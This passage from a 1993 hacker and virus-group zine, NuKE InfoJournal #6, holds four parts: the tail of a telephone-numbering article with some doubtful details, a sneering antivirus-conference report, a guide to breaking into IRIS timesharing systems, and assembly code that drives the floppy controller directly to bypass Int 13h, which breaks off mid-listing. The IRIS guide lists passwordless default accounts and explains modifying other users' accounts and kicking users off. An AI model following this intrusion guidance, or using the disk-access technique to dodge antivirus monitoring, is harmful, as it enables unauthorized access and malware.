numbers), sometimes for a fee. In some areas the telephone company has other exchanges set aside for 976-type usage; for instance in Pennsylvania the telco has reserved the 556 exchange for this purpose, and in Texas 703 is used. Sometimes these other exchanges must be specifically requested by the customer to be dialed (in other words they default to blocked). 844 ~~~ The 844 exchange used to be used for time (it was TIme-4 under the old exchange-name system), but the telephone companies figured why give away this service for free when you can charge $0.50 via a 976 number. Now time is generally found at NPA-976-1616, and the 844 exchange is available for normal usage. (Interesting note: in the San Francisco Bay area [408, 415, 510, 707], you can get the time by dialing "POPCORN", billed as a local call. In New York and Boston, the number used to be "NERVOUS.") 936 ~~~ Like 844, the 936 was once used for pre-recorded messages, only 936 was used for weather announcements (it was WEather-6 in the old days). This, like time, has been moved to a 976 service in most places, usually at NPA-976-1212 (and they throw in obnoxious ads to boot!). Now 936 is usually just a normal exchange. % Phone capacity % ~~~~~~~~~~~~~~~~~~ The original design of telephone numbers was: (NBX) NNX-XXXX. In theory, this gives: N B X N N X X X X X 8 * 2 * 10 * 8 * 8 * 10 * 10 * 10 * 10 * 10 = 1.024 billion numbers However, as some area codes and exchanges are reserved for special purposes (such as 411, 555 exchange, etc), the total possible number of telephone numbers was somewhat less. As the exchange codes in some area codes were used up, some central offices started using the NXX format, where the middle digit can then be a zero or one; this began in New York and Los Angeles and is now used in almost every area code. Now, telephone numbers look like this: (NBX) NXX-XXXX. This gives a potential of: N B X N X X X X X X 8 * 2 * 10 * 8 * 10 * 10 * 10 * 10 * 10 * 10 = 1.28 billion numbers However, codes like 411 and 611 would not be assigned because they will still be needed for services such as directory assistance and repair. Nevertheless, some unused N11 codes like 211 may be found in some area codes as active exchanges. It's also not a good idea to assign the home area code (or nearby area codes), as this could cause confusion. Going from NNX exchange codes to NXX only represents a 25% increase in the total theoretical amount of telephone numbers, and not all area code regions are expected to run out of exchanges. The ultimate goal is not only to use area codes for exchanges codes, but to use exchanges codes for area codes also. This means that telephone numbers will ultimately look like this: (NXX) NXX-XXXX. This gives a potential of: N X X N X X X X X X 8 * 10 * 10 * 8 * 10 * 10 * 10 * 10 * 10 * 10 = 6.4 billion numbers With a five-fold increase in the number of possible area codes, there should be plenty of room to grow for some time. % Placing calls % ~~~~~~~~~~~~~~~~~ Basically, all calls within an area code will ultimately be dialed in one of the following ways: 1) dial seven digits; 2) dial one plus home area code plus the local number; or 3) dial one plus the seven digit number within area code, then wait for a few seconds to time out. One alternative not mentioned in official documents (for touch tone phones) is to use one plus seven digit number in home area code then pressing the pound key, with the pound key terminating the dialing (as in international dialing). * "1+" is generally used for direct-dialed long distance calls within North America, especially calls outside the local area code. Sometimes intra-LATA calls must be dialed 1-NXX-XXX or even 1-NPA-NXX-XXXX if they're outside your local calling area. Yep, unlike almost all of the rest of the world, World Zone One uses 1 for DDD calls instead of the internationally-standard 0. * "0+" is used to dial operator-assisted or automated credit card calls within North America. After 0 + (area code) + number are dialed, a prompt tone (same tones as a dial tone, but for a very short duration) will be issued, then one of the following actions will be taken: 1) wait for a few seconds, then an operator will come on line; 2) dial "0" to get the operator immediately (for a collect or person-to-person call, etc.); or 3) dial the telephone company credit card number for billing purposes. It is unclear what will happen in the cases of automated collect calls, as to what kinds of dialing would be standard in that case. In my area, a computer voice system prompts you for your name, then dials the number and says "You have a collect call from [your three-second message]. Press one to accept the charges or two to reject the call" (or something very close to that). Of course, this system is open to abuse: probably the most collect calls are made from a Mr./Ms. "Call me back at NXX-XXXX", etc... Also, this system is only used for local calls. * Dialing "0" and waiting will get the local area operator. * "00" is used in the U.S. to get the operator for a default long distance carrier. This is used as most long distance companies have their own operators. A single "0" digit will call up the local operator (with the local telephone company as opposed to the long distance company). * "01" is used for overseas calls. "01+" indicates an operator-assisted or automatic credit card call, while "011+" indicates a direct-dialed overseas call. "010+" is reserved for some unspecified future use. * "10XXX+" is used in the U.S. to indicate which long distance carrier to use in a situation known as "equal access." This allows a telephone subscriber to select a long distance company for a particular call. For instance, "10288+" gets AT&T (288 is ATT...), while "10222+" gets MCI and "10333+" selects U.S. Sprint. After this code, a 1 or 0 is dialed (to indicate direct dial or operator-assisted call), then the number to be called. With this system you can place a call via another carrier if they offer lower rates, etc. for that particular call. You get a separate bill in a month or two. 10000 is not available for assignment. 10001 - 10099 are reserved for restricted purposes. 10100 - 10199 are reserved for international carriers. 10200 - 10999 are assigned to standard long distance carriers. Canada doesn't have to worry about this code yet, though given the recent changes in long-distance regulation, it's likely that they will adopt a U.S.-style system soon. * "11+" is reserved for special calling services like call-waiting functions, etc. For instance, "1170" is used to disable the call-waiting. The asterisk or "star" key ("*") can be used instead of the "11" prefix on touch-tone phones. The current special calling codes on many local telephone systems are: *57 - call tracing request (some systems use this for call back) *60 - call blocking activated *61 - priority ring activated *63 - select call forwarding activated *66 - repeat dialing activated *67 - call number ID blocking (must be dialed before each call) *69 - call return activated *70 - disable call waiting *71 - three-way calling according to usage *72 - enable call forwarding *73 - disable call forwarding *74 - modify speed calling directory entry (for 8 # service) *75 - modify speed calling directory entry (for 30 # service) *76 - call pickup *79 - ring again *80 - call blocking disabled *81 - priority ring disabled *83 - select call forwarding activated *86 - repeat dialing disabled *89 - call return disabled % International dialing % ~~~~~~~~~~~~~~~~~~~~~~~~~ International Direct Distance Dialing (011+/01+ dialing) began in 1970 between New York and London, and has since become available in all service areas in North America. Over 99% of the world's telephones are reachable from the United States and Canada. According to AT&T, the only areas which require operator assitance to reach are: Afghanistan, Burma, Cuba, Easter Island, Laos, Niue, Norfolk Island, Somalia, Spanish Sahara, Sudan, Tuvalu, Vanatu, Wallis and Futuna, and Yemen. From Canada, calls can direct-dialed to Cuba and Burma (the U.S. government doesn't permit any calls to there, even though the capability exists). North Korea cannot be dialed at all, period, even with an operator; not only do they have a primitive phone system and are politically shunned, they also just changed everyone's phone number, so no one can dial in and spread evil Capitalist propaganda. (There are no phone books in North Korea -- that's classified information. Seriously.) As you can see, most of the non-direct-dialable numbers are small Pacific islands; these calls aren't direct-dialable because the only trunks to these countries are generally to Australia or other Pacific countries, and AT&T is only allowed to use the trunks for an hour or two each day. Other countries just have phone systems in such awful condition that they can't be dialed easily (Laos, Sudan, etc.), while Cuba and Burma are banned in the U.S. for political reasons. Within a few years, the capability to direct-dial all telephones in the world should exist. Already IDDD exists to certain research bases in Antarctica, Mongolia, and other places you'd never even *want* to call. It's only a matter of time, now... % The future of World Zone One % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ On January 1, 1995 all telephone systems are expected to change their equipment over to allow for new "interchangeable" area codes (area codes whose second digits are not one or zero). This date was originally to be July 1, 1995 but was moved up to January because of increasing demand for phone numbers due to fax, modem, and cellular phones. The initial set of new area codes will take the form NN0, or those numbers ending in zero. This means that areas codes that do not have exchanges ending in zero (or only a few NN0 exchanges that could be renumbered) can still be able to tell the difference between an exchange and an area code by looking at the first three digits. The new NN0-type area codes will be assigned starting with these first few codes (in order): 260, 480, 520, 590, 650, 220, 250, 490, 660, 680, 720, 730, 850, and 940. The 970 NPA will be reserved for phone testing purposes, and will not become and area code. New area codes may be assigned as follows: geographic codes will use N2X and N3X, N4X through N7X will be used for expansion, and N8X and N9X will be used for non-geographic codes. (In this notation N represents a digit from 2 to 9, and X represents any digit.) Thus, area codes like 223, 734, or 520 would be geographic codes under the proposal, while area codes like 987, 294, or 780 would be non-geographic (like 700/800/900 numbers are now). This middle digit of the area code is referred to as the "B" digit, thus the B digit indicates a new geographic or non-geographic code. As the initial set of geographic or non-geographic codes are used up, expansion takes place by using the nearest available expansion set. Thus, N4X codes are next in line for geographic codes expansion, while N7X codes are next for non-geographic expansion. Ultimately, expansion to more digits will be needed in the distant future, and it is proposed that either the N5X or N6X codes can be used to provide for "expansion" codes to set up a numbering plan of more than ten digits. In addition to the new area codes, the Carrier Identification Code format of 10XXX+ will be expanded to 101XXXX+ in the near future, because nearly all of the 10XXX codes are assigned at this time. On December 31, 1996 (referred to as "Time T"), there will be an expansion of the maximum international number length from twelve digits to fifteen digits, according to a CCITT recommendation. Already one country has moved to fourteen digit numbers, and more such plans are likely in the future; in order to continue to permit direct dialing to such countries, the maximum number of digits allowed for IDD calls must be increased to at least fifteen. Also, it has been recommended that the North American phone system evolve to ten-digit dialing for station-to-station (network based) calls, including local calls. The idea is to start in the metropolitan areas using "overlay" NPA codes like New York and perhaps other areas soon. It is also proposed that 1+ be eliminated as a long-distance access prefix; in other words, any call in North America would consist of ten digits, whether local, long distance, or to an 800/900-type service. In effect, everyone will have a ten-digit phone number, instead of a seven-digit phone number and a three-digit area code, as under the current plan. Who will get the first interchangeable area code? No one knows for certain, but by observing number of exchanges in each area we can make some educated guesses. Alabama (205) and Arizona (602) both will need new NPAs very soon, as will 206 (western Washington), 703 (Houston area) and [gasp!] 708 (suburban Chicago). One of these five areas will almost certainly get the first code. Some claim it will be 708... An Illinois Bell operator denies this (but remember, this is an IBT operator here, not someone who knows what they're talking about). There is also a rumour that the next split will occur somewhere in Florida, though this seems unlikely as none of Florida's NPAs are running out of numbers and other areas need them much more urgently. Only time will tell. % Conclusion % ~~~~~~~~~~~~~~ Well folks, I hope this information has been of use to you. The telephone system can be a fascinating thing (and I'm not just talking about phreaking here), and I encourage you to learn more on your own. Also, look for more articles about the world telecommunications network in future NuKE InfoJournals. I'd also like to take the time to give credit where credit is due: some of the information in this article was gleaned from the comp.dcom.telecom newsgroup on the Usenet and the Telecom Digest archives at lcs.mit.edu, with other bits coaxed from IBT and AT&T operators, borrowed from other text files, and written from personal knowledge and outside research. Enjoy, everyone. Nowhere Man/NuKE =============================================================================== =============================================================================== Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "National Computer Security Association (NCSA) -N E- Cover Report" Nu -N uK Nu By KE uK Throbbing Grisle E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu % NCSA San Francisco Conference January 1993 % Yes, that's right, I got in at the National Computer Security Association's Conference pertaining to computer security in general and viruses in particular. Thanks goes out to my University professor for giving me his unwanted complimentary tickets (way to go, Les!). Since I was on semester break, I called my friend C.K. and we were off, to what is affectionately known in the bay area as, "The City." This would not be that big of deal, except that the list of speakers reads like a who's who of the anti-viral industry. We started off with a lecture by the Man himself, Mr. John McAfee. What can we say about this guy? Well, we noticed that John is like the Hugh Hefner of the AV (AntiVirus) world. He comes in very well dressed, very confident, and can get away with saying the most inaccurate pieces of crap and the crowd eats it up like its ice cream! At one point in his lecture, John stated that the Dir II virus "infects the FAT". Huh?!?! Tell the truth, John. You ain't no programmer. When was the last time you typed in "#include "? Bet you never have. But the ironic thing about the whole show is that there are guys there who know way more about viruses, even have better products out on the market, but who aren't nearly as successful. Does that mean there was McAfee bashing going on? Naw...no resentment here! [NOT] The next lecture C.K. and I went to ,a long and greasy brunch, was David Stang. "David Who?" you might ask? Well, I never heard of him before either, but he claims to have started the NCSA (wow - what an accomplishment) and then left it (left or kicked out?) but comes back to give lectures (no hard feelings, right?) Well, anyway, he was there to sell his Virus Analysis Machine, which consisted of the same ol' bait files, a little bit of checking (where is the code placed??), and then it runs the file through Sourcer. I would have thought he could have written his own disassembler, one specifically for viruses. We decided that it would not even be worth pirating. You can bet the other programmers in the audience thought the same thing. Well, we decided to wrap up the days festivities (before going out into the San Francisco night to party) by attending Alan Soloman's lecture. He is the good doctor from Doctor Soloman's Anti-Virus Tool Kit. This guy is the kind of Brit that would extract a fee from the US and Canada for using the English Language. Tight? You probably couldn't get dental floss through his `arsehole.' He gets up there waving his arm, making snide comments about everybody and everything (with side implications to McAfee; I get the feeling these two would not make good roommates). Then he talks about CARO, being the `Saviour of the world.' CARO, from what I could gather from the conference, is a group of virus researcher that happens to include Alan Soloman and Fridrik Skulason (maker of F-Prot AntiVirus). The way these guys talk about their group, I though I was listening to a YAM conference! They really think their group has made a Difference and they are the only protectors against viruses that matter. I turned to a very attractive girl who was sitting nearby (must have been from Marketing) and asked, "Is McAfee part of CARO?", to which she rolled her eyes and said, "Are you kidding? They hate each other." With these amazing memories etched in our minds, we wandered out into the harsh city for a night of over-indulgence. So much so, we couldn't get up the next day until noon (well, we _were_ on semester break!) We made it up for the middle of someone's else's lecture (I can't remember whom it was - he had an accent and spoke about how to disassemble viruses. Did I learn anything? Did I care?) Okay, we found that boring enough so we went to the exhibit. Did you know people are still working on hardware solutions for viruses? The girl was pretty cute at the booth, so I became overly interested in their shitty product, asking questions like "Gee, so I wouldn't need any updates?" "Oh no, not with our product", she purred. Yeah, Right. Then we went to a panel discussion where the Good Dr. Soloman, and three other guys were talking about the teenage personality distortion patterns of the virus writer/hacker. Nothing new here. We're all suicidal virgins, y'know. (Even though many of use are married with kids, and I presume the rest did pass their puberty stage. Come on, where you getting this info?) The last seminar was given by Fridrik Skulason. This guy is all the way from Iceland. (Iceland? They have computers up there? Better yet, `When did they learn to type?') If Soloman is the Arch Enemy of McAfee, Skulason would have been McAfee in an anti-matter universe. What the hell does that mean? It means that McAfee is dark, tall and slim. Fridrik is pale, blond and puggy. McAfee is an effective speaker (Imposing his Reign of Error); Fridrik is quiet. I mean _real_ quiet. C.K. wanted to set the guy on fire just to see if he could let out a loud yell. John McAfee has Charisma! Fridrik has facts and knows what the hell he is talking about. (Big Deal? huh?) So here is what I could conclude from the conference; a) AntiVirus is a big business, McAfee still is the heavyweight champ, but there are a lot of contenders out there that want to knock out the chump, er, champ. However, there is a fallout coming, where only the strong will survive. It is not a time or place for a company to start any more; XTREE's resent failure was sited as an example of that. b) The AntiVirus would is much more `clickish' than I would have thought. Kind of reminds me of high school. Some people won't talk to others. Amusing. c) The AntiVirus world is scared. The sheer of new viruses is increasing exponentially, overtaking some scanners. VCL was mentioned, as well as MPC as the new trend that threatens the AV developer. A fall out is predicted in this business. Any last parting shots? You Bet! David Stang: Have you ever thought of selling real estate? Fridrik Skulason: Try charging a little more for F-Prot and take a vacation; you need the sun. John McAfee: Keep making VIRUSHAM, but sock the money away. Your days are numbered. Throbbing Grisle ================================================================================ ================================================================================ Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "Interactive Realtime Information Service (IRIS) -N E- Guide" Nu -N uK Nu By KE uK Ned239 E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu % IRIS R9.1.3A Introduction % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hello Everybody, I would like to know what has happened to the hacking world. Now it's basically dead, at least in most areas I know of. I hope to change that. Anyways, Here is some info on a relatively old System called IRIS or Interactive Realtime Information Service. This system was originally meant to run on older systems like PDP-8 and PDP-11. Due to the versatile nature of IRIS, today a lot more systems run it. IRIS systems usually can be reached at 1200 7E1 and after pressing either ESCape or Enter a few times, you should see something like this as a greet: -=- Welcome to "IRIS" R9.1.3A timesharing ! ACCOUNT ID ? -=- Or sometimes it will say what you have reached under the welcome line. IRIS is also extremely hacker-friendly as it will let you type account names for as long as you want. Also when you guess an account there are no passwords on them. At first you will not see what you type, to change this type Control-E to turn the echo on. Try CAPSLOCK also. -=- DEFAULT ACCOUNTS ---------------- MANAGER (Good System Access) NO NAME (Normal User) DEMO (Try the other ones first) PDP8 / PDP11 < == All General Accounts SOFTWARE \ Hopefully you're in there with one of those accounts. Now, then you will get a # prompt. If you are on with an account of access level 3, then you will be able to use a user maintanencer program, by typing either ACCOUNTS or ACCOUNT UTILITY. You should get: -=- (0) EXIT TO SYSTEM (1) ADD NEW ACCOUNT (2) MODIFY ACCOUNT (3) DELETE ACCOUNT (4) INQUIRE ACCOUNT (5) LIST THE ACCOUNTS Ah, I wasn't able to create an account, but I did modify several. Basically this is pretty straight forward. -=- Ok, after you're done playing with the accounts and exit properly there are a lot of interesting features on this IRIS. On one particular system that I use often you have several utilities such as spreadsheets, word processors and even an ASM program. You can get a list of all the things to do by typing LIBR at the # prompt. most of the filenames you type the response will be "NOT A PROCESSOR", Since most of the IRIS software was written is business BASIC. Type BASIC LOAD . Here are some of the most interesting programs. PP or PORT ALL MONITOR will let you see who else is using the system. if for some reason you want to kick off a user, type PPP and then the user name. Also if you want to see your own status type PROT.STAT If you need help with something try typing GUIDE and it will give you a short menu of all the help files available. Too bad there usually isn't many. Another interesting utility to use is BLOCKCOPY, since I am not completely used to it, I will show you what the guide said: INTERACTIVE PROGRAM GUIDES FOR IRIS CONFIGURATION AND SETUP TOPIC # FOR INFORMATION ON: 1 BLOCKCOPY THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'. REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR. ENTER TOPIC # 1 INTRODUCTORY COMMENTS ON USING BLOCKCOPY PRINT HERE OR $LPT (C/R OR $) : INTERACTIVE PROGRAM GUIDE ON SETTING UP BLOCKCOPY INTRODUCTION BLOCKCOPY IS A STAND-ALONE UTILITY PROGRAM WHICH GIVES GREAT FLEXIBILITY IN COPYING ANY PART OF ONE DISC TO ANY PART OF ANOTHER, EVEN ONTO A DIFFERENT DISC CONTROLLER. BLOCKCOPY DOES NOT PROVIDE FAST PERFORMANCE, BUT IT CAN BE VERY USEFUL IN SPECIAL CASES. EXAMPLES: 1) YOU CAN COPY A SINGLE LOGICAL UNIT FROM ONE PACK TO ANOTHER, WITHOUT OVERWRITING OTHER LOGICAL UNITS ALREADY ON THE DESTINATION. 2) IF YOU HAVE BOTH LARGE STORAGE MODULES AND SMALLER CARTRIDGE DRIVES ON THE SAME SYSTEM, YOU CAN BACKUP YOUR SYSTEM LOGICAL UNIT 0 FROM STORAGE MODULE ONTO A CARTRIDGE PACK WHICH CAN BE SET ASIDE AS A DEDICATED SYSTEM BACKUP. 3) IF YOU HAVE A SPECIAL SWAPPING DISC, IT CAN BE BACKED UP TO AND RESTORED FROM OTHER STORAGE MODULES. PRESS RETURN WHEN READY TO GO ON LIMITATIONS NOTE THAT WHILE YOU CAN COPY FROM ONE TYPE OF DISC CONTROLLER TO ANOTHER, THE RESULT MAY NOT BE INSTALLABLE UNDER IRIS BECAUSE OF SOME DISC ADDRESS CONSIDERATIONS. ALSO NOTE THAT YOU MAY NOT SPECIFY A DESTINATION WHICH PHYSICALLY OVERLAPS THE SOURCE ON THE SAME PACK. SETUP FIRST, HAVE AT HAND YOUR R9.0 PERIPHERALS HANDBOOK. NOTICE THAT FOR EACH TYPE OF DISC, THERE IS A DIFFERENT VALUE FOR THE BZUD POINTER. ALSO NOTICE THAT IT GIVES YOU FORMULAS TO COMPUTE VALUES CALLED PHYU. FIND THE APPROPRIATE DISC SPECIFICATION SHEET(S) DESCRIBING YOUR SOURCE (WHERE YOU ARE COPYING BLOCKS FROM) AND YOUR DESTINATION (WHERE YOU ARE COPYING BLOCKS TO). THE SOURCE AND DESTINATION DO NOT HAVE TO BE THE SAME TYPE OF CONTROLLER. PRESS RETURN WHEN READY TO GO ON NOTE: ALL REQUESTED VALUES/CALCS IN OCTAL UNLESS OTHERWISE NOTED. ALL VALUES ON DISC SPECIFICATION SHEETS ARE IN OCTAL. ENTER THE FOLLOWING VALUES FOR THE SOURCE: ADDRESS OF THE SOURCE BZUD : 0 COMPUTED VALUE OF SOURCE PHYU : 0 STARTING CYLINDER NUMBER : 0 BLOCK # IN THE CYL TO START COPYING FROM (ORIGIN 0) THIS IS NORMALY ZERO : 0 SOURCE CONTROLLER'S DEVICE CODE : 0 SOURCE DISC'S LRC : 0 NUMBER OF CYLINDERS TO COPY (REM TO GIVE IN OCTAL) : 0 ENTER THE FOLLOWING VALUES FOR THE DESTINATION: ADDRESS OF THE DESTINATION BZUD : 0 COMPUTED VALUE OF DESTINATION PHYU : 0 STARTING CYLINDER : 0 BLOCK # IN THE CYL TO START COPYING TO (ORIGIN 0) : 0 DESTINATION CONTROLLER'S DEVICE CODE : 0 PRINT HERE OR $LPT (C/R OR $) : 0 RUN "MAKEBLOCKCOPY", WHEN FINISHED ENTER THE FOLLOWING COMMAND: #SHUTDOWN [PASSWORD] BLOCKCOPY @73000,X73000 USE DBUG TO SET UP THE FOLLOWING LOCATIONS: 200 : 0 201 : 0 202 : 0 203 : 0 204 : 0 205 : 0 206 : 0 207 : 0 210 : 0 211 : 0 212 : 0 213 : 176346 PRESS RETURN WHEN READY TO GO ON 0 THEN J410 (OR RESET & START AT 410) TO START THE COPY RULES FOR BLOCKCOPY: ADDRESS FUNCTION 400 BAD HALT 401 NOT USED 402 NOT USED 410 START COPY 411 START VERIFY 412 START DISC PATTERN GENERATOR 413 START DISC PATTERN VERIFICATION 414 RETRY CURRENT BLOCK/IF SUCCESSFUL, RESUME-NO LOSS 415 SKIP CURRENT BLOCK/GO TO NEXT BLOCK - BLOCK LOST 416 START INFINITE DISC PATTERN TEST PRESS CR TO CONTINUE DISPLAY OF RULES HALTS: 63077 INDICATES A SUCCESSFUL COMPLETION 63377 WRONG VALUE(S) IN TABLE STARTING AT 200 67077 READ ERROR 73077 WRITE ERROR 63277 VERIFY ERROR IN CORE COMPARE ON READ OR WRITE ERROR, CHECK THE FOLLOWING CELLS: 260 = CURRENT SOURCE RDA 261 = CURRENT DEST RDA 262 = CURRENT DISC STATUS NO AUTOMATIC RETRIES ARE DONE. ON A BAD BLOCK, THERE ARE OPTIONAL RESTARTS AT LOC 414 & 415 (SEE ABOVE) INTERACTIVE PROGRAM GUIDES FOR IRIS CONFIGURATION AND SETUP TOPIC # FOR INFORMATION ON: 1 BLOCKCOPY THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'. REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR. -=- Also you can edit individual text files and configuration files by text editors. The names of this shit is different on all the systems I've called. -=- %CONCULSION I hope this serves a useful purpose.. I still can't understand why IRIS is extremely easy to use, and very common.. yet, I haven't seen any good articles on it in a very long time. ================================================================================ ================================================================================ Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "Programming the NEC765 Floppy Disk Controller, -N E- and the DMA Chip to bypass the Int 13h Nu -N uK Nu By KE uK Dr. X E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu % The Challenge % ~~~~~~~~~~~~~~~~~ The challenge was started by Dr. X in order to try to access the disk media without using any DOS or Bios Interrupt 13h calls. Surely a _very_ difficult challenge indeed, nevertheless Dr. X has succeeded in doing so, and he will explain the theory behind his development. This scholar does deserve a `pat on the back' for his brain teaser work. Good work Dr. X, and welcome aboard. NuKE Members/Supporters % Programming the Floppy Disk Controller & DMA chip to bypass the Int 13h % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The NEC 765 floppy disk controller chip controls floppy disk drives motors and heads. And it manages the flow of data to and from the disk sector(s). The FDC (Floppy Disk Controller) performs 15 operations in all, of which only three are discussed here. They are Seek, Read and Write. The FDC operates in three phases: 1) The command phase 2) The execution phase 3) The result phase a) The command phase : When one or more bytes are sent to the Data Registers b) The execution phase: When the FDC undertake the command c) The result phase : A number of status byte(s) are read from the Data Register(s) % I) The Ports % The FDC is operated through only three I/O (Input/Output) ports: 3F2 - Digital Output Port 3F4 - Status Register 3F5 - Data Register 1. Digital Output Port (3F2) Bits Function 1-0 Drive # ; 00=A, 01=B, 10=C, 11=D 2 0=Reset the floppy disk controller (***) 3 1=Enable FDC interrupt and DMA access 7-4 1=Turn ON drive motors D to A (bit 4 = drive A) Warning: This register is WRITE ONLY (***) Do not set bit 2 to 0 at any time (recelebrate) 2. Data Register (3F5) Operation Byte # Function Seek 1 Code number (Fh) 2 Head & Drive : 00000HDD (h=head, DD=drive) Read Sector 1 Code number (66h) 2 Head & Drive : 00000HDD (h=head, DD=drive) 3 Track number 4 Head number 5 Sector number 6 Bytes in sector (2=512) 7 End of track (09) 8 GAP Length 9 Data Length Write Sector 1 Code number (45h) 2-9 Same as READ SECTOR (above) Warning: You must be sure that the FDC is ready before you send or read a a byte from the data register. Bits 7-6 of the status register provide this information. 3. Status Register (3F4) Bits Function 3-0 1=Disk drive D-A in Seek Mode 4 1=FDC read or write command in progress 5 1=FDC is not in DMA mode 6 1=FDC data register is ready to send data 0=FDC data register is ready to receive data 7 1=FDC ready to send or receive data Warning: When a seek operation is complete, the FDC invokes a INT 6h (the disk interrupt). When the interrupt occurs, the BIOS interrupt handler sets the bit 7 of the seek status byte in the BIOS Data Area located at 0:043E. This is the sole result of the interrupt. % II) Initializing % Before initializing a channel, the program must send a code to the chip telling it whether it is reading from or writing to the Floppy Disk Controller. This one byte code is 46h for reading and 4Ah for writing. The code must be sent to each of two separate port addresses: 0E & 0C. After that, you can send the parameters to the Data Register (3F5), following the bellow steps: 1. Turn on the floppy disk (enable interrupts with a SLI first) a) Out the code byte to the Digital Output Register (3F2) b) Send 46h to read or 4Ah to write to each of two separate port addresses 0B and 0Ch (eg: Out 0B,46h Out 0C,46h) 2. Then you _must_ perform a seek operation to the concerned Head and Track; a) Out the code for Seek operation (0F) to the FDC (3F5) b) Out head & Drive code (00000HDDxB, H=head,DD=drive) c) Out the track number d) Wait for Int 6h 3. After that you can perform the read or write operation(s): a) Calculate the address of the buffer (see the program at the end of this Article) b) Send the address to the DMA c) Out the value 66h for read or 45h for write to the FDC (3F5) d) Out the Head & Drive number e) Out the Track number f) Out the Head number g) Out the Sector number h) Out the Sector Code; get this information with INT 21h i) Out End-of-Track ; with AX=1E35h j) Out the GAP length k) Out the data length l) Wait for INT 6h m) Perform 7 INs from the Data Register (3F5) to get the status bytes. (Refer to Part III) 4. Finally, turn off the motor(s): a) Out the code byte to the Digital Output Register (3F2) % III) The Status Bytes % After a read or write operation the FDC gives you 7 status bytes: Byte # Function 1 Status Byte 0 2 Status Byte 1 3 Status Byte 2 4 Track number 5 Head number 6 Sector number 7 Byte per sector code (0-3) 1. Status Byte 0 Bit # Function 7-6 00=normal termination 01=execution began, could not complete 10=invalid command 11=failed because disk drive went offline 5 1=seek operation in progress 4 1=disk drive fault 3 1=disk drive not ready 2 number of selected head 1-0 number of selected drive 2. Status Byte 1 Bit # Function 7 1=requested sector beyond last sector number 6 always 0 5 1=data transfer error 4 1=data overrun 3 always 0 2 1=cannot read or find sector 1 1=cannot write because of write protection tab 0 1=missing address mark in disk format 3. Status Byte 2 Bit # Function 7 always 0 6 1=encountered delete-data address mark 5 1=CRC error in data 4 1=track identification problem 3 1=scan command condition satisfied 2 1=scan command condition NOT satisfied 1 1=bad track 0 1=missing address mark % IV) Read Procedure in ASM (for A86 assembler) % Jmp TheCode Buffer Db 512 dup (0) ; For the sector StatusBuffer Db 7 Dup (7) ; For the status bytes TheCode Proc Near ReadSector: ; Turn ON the Motor Sti Mov Dx,03F2H Mov Al,00101101xB ; Set the Bits 0 , 2 ,3 , 4 Out Dx,Al ; Wait for motor to come to speed (1/2 second) Call Motor_Delay Mov Cx,2000 Loop $ ; Begin the initialization of DMA Chip Mov Al,46H ; Code for Read Datas Out 11,Al ; Send Datas Out 12,Al ; Now , Calculate buffer address Lea Ax,Buffer ; Mov Bx,Ds ; Rol Bx,4 ; Push Bx ; And Bl,0FH ; Mov Dl,Bl ; Pop Bx ; Add Ax,Bx ; Jnc NoCarry ; Inc Dl ; NoCarry: ; Dec Al ; justify Out 4,Al ; Send Low Byte of adress to the DMA controller Mov Al,Ah ; Out 4,Al ; Send High byte of the adress // // // // Mov Al,Dl ; Out 81h,Al ; Send Page number (Page register) ; Finish initialization Mov Ax,511 ; Out 5,Al ; DMA controller Mov Al,Ah ; Out 5,Al ; Mov Al,2 ; Out 10,Al ; DMA controller ; Get pointer to disk base Mov Al,1EH ; Mov Ah,35H ; Int 021H ; ; Send read parameters. Mov Ah,066H ; Code for single sector read Call Out_Fdc ; Send It Mov Ah,2 ; Head&Drive # Call Out_FDC ; Send It Mov Ah,1 ; Track Number Call Out_FDC ; Send It Mov Ah,0 ; Head # Call Out_FDC ; Send It Mov Ah,3 ; Sector # Call Out_FDC ; Send it Mov Ah,Es:[Bx]+3 ; Sector Size code (2=512 bytes) Call Out_FDC ; Send it Mov Ah,Es:[Bx]+4 ; End-of-track # Call Out_FDC ; Send It Mov Ah,Es:[Bx]+5 ; Gap length Call Out_FDC ; Send it Mov Ah,Es:[Bx]+6 ; Datas length Call Out_FDC ; Send Call Wait_Interrupt ; Wait Int 6 ; Read the result bytes .. Mov Cx,7 Lea Bx,StatusBuffer Next: Call In_FDC Mov [BX],Al Inc Bx Loop Next ; Turn OFF the motor Mov Dx,03F2H Mov Al,00001101xB ; Turn Off the Drive B Out Dx,Al Ret ; Exit from the programm Sector_REad Endp Wait_interrupt Proc ; Monitor the int 6 in bios status Byte Mov Ax,40H Mov Es,Ax Mov Bx,3EH Again: Mov Dl,Es:[BX] Test Dl,080H Jz Again And Al,127 Mov Es:[Bx],Dl Ret Wait_Interrupt EndP Out_FDC proc near Mov 